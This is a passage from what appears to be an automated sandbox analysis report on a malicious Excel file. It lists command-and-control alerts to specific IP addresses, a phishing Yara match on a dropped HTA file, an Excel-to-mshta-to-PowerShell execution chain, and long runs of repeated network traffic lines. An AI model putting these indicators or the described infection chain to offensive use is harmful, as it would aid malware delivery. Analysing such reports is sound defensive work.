          2024-10-30T08:05:39.974781+010028257661Malware Command and Control Activity Detected192.168.2.224920494.156.177.22080TCP
          2024-10-30T08:05:41.093295+010028257661Malware Command and Control Activity Detected192.168.2.224920594.156.177.22080TCP
          2024-10-30T08:05:42.223444+010028257661Malware Command and Control Activity Detected192.168.2.224920694.156.177.22080TCP
          2024-10-30T08:05:43.323474+010028257661Malware Command and Control Activity Detected192.168.2.224920794.156.177.22080TCP
          2024-10-30T08:05:44.443649+010028257661Malware Command and Control Activity Detected192.168.2.224920894.156.177.22080TCP
          2024-10-30T08:05:45.594078+010028257661Malware Command and Control Activity Detected192.168.2.224920994.156.177.22080TCP
          2024-10-30T08:05:46.719816+010028257661Malware Command and Control Activity Detected192.168.2.224921094.156.177.22080TCP
          2024-10-30T08:05:47.844722+010028257661Malware Command and Control Activity Detected192.168.2.224921194.156.177.22080TCP
          2024-10-30T08:05:48.994924+010028257661Malware Command and Control Activity Detected192.168.2.224921294.156.177.22080TCP
          2024-10-30T08:05:50.136564+010028257661Malware Command and Control Activity Detected192.168.2.224921394.156.177.22080TCP
          2024-10-30T08:05:51.723367+010028257661Malware Command and Control Activity Detected192.168.2.224921494.156.177.22080TCP
          2024-10-30T08:05:53.016944+010028257661Malware Command and Control Activity Detected192.168.2.224921594.156.177.22080TCP
          2024-10-30T08:05:54.388350+010028257661Malware Command and Control Activity Detected192.168.2.224921694.156.177.22080TCP
          2024-10-30T08:05:55.506350+010028257661Malware Command and Control Activity Detected192.168.2.224921794.156.177.22080TCP
          2024-10-30T08:05:56.882882+010028257661Malware Command and Control Activity Detected192.168.2.224921894.156.177.22080TCP
          2024-10-30T08:05:58.006444+010028257661Malware Command and Control Activity Detected192.168.2.224921994.156.177.22080TCP
          2024-10-30T08:05:59.129063+010028257661Malware Command and Control Activity Detected192.168.2.224922094.156.177.22080TCP
          2024-10-30T08:06:00.249790+010028257661Malware Command and Control Activity Detected192.168.2.224922194.156.177.22080TCP
          2024-10-30T08:06:01.359866+010028257661Malware Command and Control Activity Detected192.168.2.224922294.156.177.22080TCP
          2024-10-30T08:06:03.427994+010028257661Malware Command and Control Activity Detected192.168.2.224922394.156.177.22080TCP
          2024-10-30T08:06:05.794636+010028257661Malware Command and Control Activity Detected192.168.2.224922494.156.177.22080TCP
          2024-10-30T08:06:06.906331+010028257661Malware Command and Control Activity Detected192.168.2.224922594.156.177.22080TCP
          2024-10-30T08:06:08.007595+010028257661Malware Command and Control Activity Detected192.168.2.224922694.156.177.22080TCP
          2024-10-30T08:06:09.216752+010028257661Malware Command and Control Activity Detected192.168.2.224922794.156.177.22080TCP
          2024-10-30T08:06:10.329968+010028257661Malware Command and Control Activity Detected192.168.2.224922894.156.177.22080TCP
          2024-10-30T08:06:11.503152+010028257661Malware Command and Control Activity Detected192.168.2.224922994.156.177.22080TCP
          2024-10-30T08:06:12.668267+010028257661Malware Command and Control Activity Detected192.168.2.224923094.156.177.22080TCP
          2024-10-30T08:06:13.809588+010028257661Malware Command and Control Activity Detected192.168.2.224923194.156.177.22080TCP
          2024-10-30T08:06:15.137055+010028257661Malware Command and Control Activity Detected192.168.2.224923294.156.177.22080TCP
          2024-10-30T08:06:16.279985+010028257661Malware Command and Control Activity Detected192.168.2.224923394.156.177.22080TCP
          2024-10-30T08:06:17.447186+010028257661Malware Command and Control Activity Detected192.168.2.224923494.156.177.22080TCP
          2024-10-30T08:06:18.565337+010028257661Malware Command and Control Activity Detected192.168.2.224923594.156.177.22080TCP
          2024-10-30T08:06:19.664244+010028257661Malware Command and Control Activity Detected192.168.2.224923694.156.177.22080TCP
          2024-10-30T08:06:20.905171+010028257661Malware Command and Control Activity Detected192.168.2.224923794.156.177.22080TCP
          2024-10-30T08:06:22.010824+010028257661Malware Command and Control Activity Detected192.168.2.224923894.156.177.22080TCP
          2024-10-30T08:06:23.254521+010028257661Malware Command and Control Activity Detected192.168.2.224923994.156.177.22080TCP
          2024-10-30T08:06:24.383881+010028257661Malware Command and Control Activity Detected192.168.2.224924094.156.177.22080TCP
          2024-10-30T08:06:25.510440+010028257661Malware Command and Control Activity Detected192.168.2.224924194.156.177.22080TCP
          2024-10-30T08:06:26.683858+010028257661Malware Command and Control Activity Detected192.168.2.224924294.156.177.22080TCP
          2024-10-30T08:06:27.814008+010028257661Malware Command and Control Activity Detected192.168.2.224924394.156.177.22080TCP
          2024-10-30T08:06:28.949969+010028257661Malware Command and Control Activity Detected192.168.2.224924494.156.177.22080TCP
          2024-10-30T08:06:30.169831+010028257661Malware Command and Control Activity Detected192.168.2.224924594.156.177.22080TCP
          2024-10-30T08:06:31.261182+010028257661Malware Command and Control Activity Detected192.168.2.224924694.156.177.22080TCP
          2024-10-30T08:06:32.735329+010028257661Malware Command and Control Activity Detected192.168.2.224924794.156.177.22080TCP
          2024-10-30T08:06:33.866597+010028257661Malware Command and Control Activity Detected192.168.2.224924894.156.177.22080TCP
          2024-10-30T08:06:34.981551+010028257661Malware Command and Control Activity Detected192.168.2.224924994.156.177.22080TCP
          2024-10-30T08:06:36.091784+010028257661Malware Command and Control Activity Detected192.168.2.224925094.156.177.22080TCP
          2024-10-30T08:06:37.229832+010028257661Malware Command and Control Activity Detected192.168.2.224925194.156.177.22080TCP
          2024-10-30T08:06:38.518588+010028257661Malware Command and Control Activity Detected192.168.2.224925294.156.177.22080TCP
          2024-10-30T08:06:39.633526+010028257661Malware Command and Control Activity Detected192.168.2.224925394.156.177.22080TCP
          2024-10-30T08:06:40.751576+010028257661Malware Command and Control Activity Detected192.168.2.224925494.156.177.22080TCP
          2024-10-30T08:06:41.872360+010028257661Malware Command and Control Activity Detected192.168.2.224925594.156.177.22080TCP
          2024-10-30T08:06:43.230803+010028257661Malware Command and Control Activity Detected192.168.2.224925694.156.177.22080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-30T08:04:21.083990+010028582951A Network Trojan was detected198.46.178.15180192.168.2.2249188TCP
          2024-10-30T08:04:21.083990+010028582951A Network Trojan was detected198.46.178.15180192.168.2.2249177TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-30T08:04:32.340412+010028587951A Network Trojan was detected192.168.2.2249167198.46.178.15180TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Machine Learning detection for sample
          Source: PO.2407010.xlsJoe Sandbox ML: detected

          Phishing

          barindex
          Yara detected HtmlPhish44
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatthingswithmegood[1].hta, type: DROPPED
          Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.22:49168 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.22:49169 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.22:49175 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.22:49176 version: TLS 1.0
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49163 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49165 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49172 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49171 version: TLS 1.2
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jk3wn0wt\jk3wn0wt.pdbhP source: powershell.exe, 00000011.00000002.484734219.00000000027FA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.pdbhP source: powershell.exe, 00000005.00000002.457385625.00000000023D1000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jk3wn0wt\jk3wn0wt.pdb source: powershell.exe, 00000011.00000002.484734219.00000000027FA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.pdb source: powershell.exe, 00000005.00000002.457385625.00000000023D1000.00000004.00000800.00020000.00000000.sdmp

          Software Vulnerabilities

          barindex
          Document exploit detected (process start blacklist hit)
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
          Suspicious execution chain found
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: global trafficDNS query: name: acesso.run
          Source: global trafficDNS query: name: acesso.run
          Source: global trafficDNS query: name: drive.google.com
          Source: global trafficDNS query: name: drive.usercontent.google.com
          Source: global trafficDNS query: name: acesso.run
          Source: global trafficDNS query: name: acesso.run
          Source: global trafficDNS query: name: drive.google.com
          Source: global trafficDNS query: name: drive.usercontent.google.com
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49175 -> 142.250.186.46:443
          Source: global trafficTCP traffic: 192.168.2.22:49176 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49177 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49188 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
